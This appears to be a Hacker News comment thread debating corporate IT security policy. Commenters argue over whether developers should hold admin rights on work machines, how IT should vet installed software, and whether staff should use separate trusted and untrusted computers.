I hate this full-system (anti-)malware crap as much as the next guy. But this:
> - I will occasionally get emails from IT asking why I have a random application installed, what it does, and why it's "operationally necessary"
The issue is that policies have to be fairly general and can't just count on all employees actually knowing what they're doing. And sometimes people actually do shady things, even if it's not intentional. And if IT is understanding, then I think it's OK.
The other day, there was a story on the HN front page [0] about some innocuous looking app that got bought and converted to some kind of shady proxy. If I was responsible for my company's staff machines, I sure as hell wouldn't want that kind of crap running on them.
What's to say that your random app won't be siphoning up ~\Documents\top_secret.doc?
Anyone with "software engineer", "developer", or "programmer" in their job title should be given full benefit of the doubt by default and only bothered if the program is proven malware. It's our job to know what we're doing, so we should have admin too. I feel like Ron Swanson in Home Depot every time I have to ask IT to do something.
As someone who’s been responsible for dealing with the consequences of “programmer” output, I’d say that they definitely should not be given the benefit of the doubt. While it may be hard to believe, the average “programmer” knows nothing about IT or networking or hardware, and you’d be lucky if they know where the power button is.
Generally “programmer” type folks are only power users in the context of software, possibly even only the software they wrote or tooling they chose.
> It's our job to know what we're doing, so we should have admin too.
Nope.
Engineers and programmers are the most-likely source of "I know what I'm doing so I can run it this way" and you end up with things like NFS running on systems that haven't been bounced in over 300 days and can't be updated because someone used sudo to break yum.
No one gets admin unless they explicitly need it. Period. Because while you may actually know what you're doing, most programmers haven't the slightest inkling about safe computing practices, based on experience.
Well, I’m glad I don’t work for you. I work for a Fortune 100 company with nearly 100,000 employees and we all have admin/root access to our company provided hardware. I’ve worked here for decades and have never heard anything through the IT grapevine of issues arising from this.
I, too, work for a fortune 500. They're actually in the top 100. No idea how many employees, though.
Every instance I've encountered with an engineer having root/admin permissions has been a shitshow.
I just now encountered an instance of engineers bypassing policy by modifying sudoers to give a lower priv'd generic/shared account passwordless sudo to shit like /usr/bin/make.
The other project I was on, I had to fight with engineers about why having a firewall on your appliance doesn't negate the need to address code execution exploits behind the firewall. These aren't security-savy individuals and they shouldn't ever be given administrative access to anything.
I'm glad you don't work for me, too; I can't stand leadership positions. I work in security and all I see are engineers fucking up daily, so I'm pretty jaded/biased at this point.
"Anyone with "software engineer", "developer", or "programmer" in their job title should be given full benefit of the doubt"
No one gets the benefit of the doubt, and certainly not programmers. You get more leeway with what we'll allow, but not free reign. Most programmers aren't HN level.
I'm not a programmer at all, my yearly code output these days can be expressed in double digit hours, and very small ones. I assure you, I do not think of myself as a programmer much less a top tier one.
Yeah, I get it, it’s easy to poke at that phrasing.
There’s also a reading of that response where they mean “HN level” like “as confident as the replied-to comment author”. Could even be a bit sarcastic.
No, but there is a curiosity test, you have to find the place; and then once you're here you have to understand things in order to find value and come back.
I actually agree with you, I just brought it up as part of the massive cultural differences between "you managed to download this thing on this very locked down system two years ago, fill out this form to tell us what it is" and "go download steam and here's a steam code for a game, we're playing at 3pm if you want to."
They're likely understaffed. They're also going to want to know why you're using it. My colleagues have had a case of someone downloading some program which was doing something that was already provided. Turned out "ours" was missing some features, so they've changed that.
It can also work as a deterrent. If you know you're going to have to fill out a form, maybe you won't download random stuff unless you actually need it.
I understand understaffed although I think that's when siloes should be broken down so technically apt people across the company can reduce the workload (like by advising on a list of safe software that shouldn't be questioned.)
I don't appreciate the deterrent culture because it's hard to get to point A to point B without some exploration if the company isn't used to trying to improve how work is done, or improve its thinking. The opportunity cost of preventing bright people from exploring is enormous. I understand, though, that compliance and uniformity are high priorities in some industries. (My experience with this kind of IT comes from aerospace and finance.)
Oh, I absolutely agree with this. But I think many companies have a hard time with this.
The issue being that, of course, this exploration may end up badly. See all the supply chain issues which have made it to the HN front page. So some guardrails should absolutely be in place.
I don't know how practical that would be, but I keep thinking we (IT people and adjacent) should possibly have two computers. An "untrusted" one, on which we'd be free to tinker, test new things, etc. No issue with nuking it if anything goes wrong. No access to "important" data or networks. And another, "trusted" one, from which you'd do your admin work, deploy to prod, etc.
I would love to see the two computer approach be more widespread. I think "one computer per desk" is a major mental hangup. Computers cost a fraction of what they used to compared to salaries and we still insist on a 1:1 ratio.
They won't have a "smeagull" role, and a "john" role, etc. If you're a dev in a dev shop, the "dev role" could cover a sizeable number of people.
In my company's case, they do have roles. The "accountant" role has like 60 people. They're all doing mostly the same thing, so it wouldn't make sense to have 60 accountant1..60 roles.
> - I will occasionally get emails from IT asking why I have a random application installed, what it does, and why it's "operationally necessary"
The issue is that policies have to be fairly general and can't just count on all employees actually knowing what they're doing. And sometimes people actually do shady things, even if it's not intentional. And if IT is understanding, then I think it's OK.
The other day, there was a story on the HN front page [0] about some innocuous looking app that got bought and converted to some kind of shady proxy. If I was responsible for my company's staff machines, I sure as hell wouldn't want that kind of crap running on them.
What's to say that your random app won't be siphoning up ~\Documents\top_secret.doc?
[0] https://news.ycombinator.com/item?id=37052508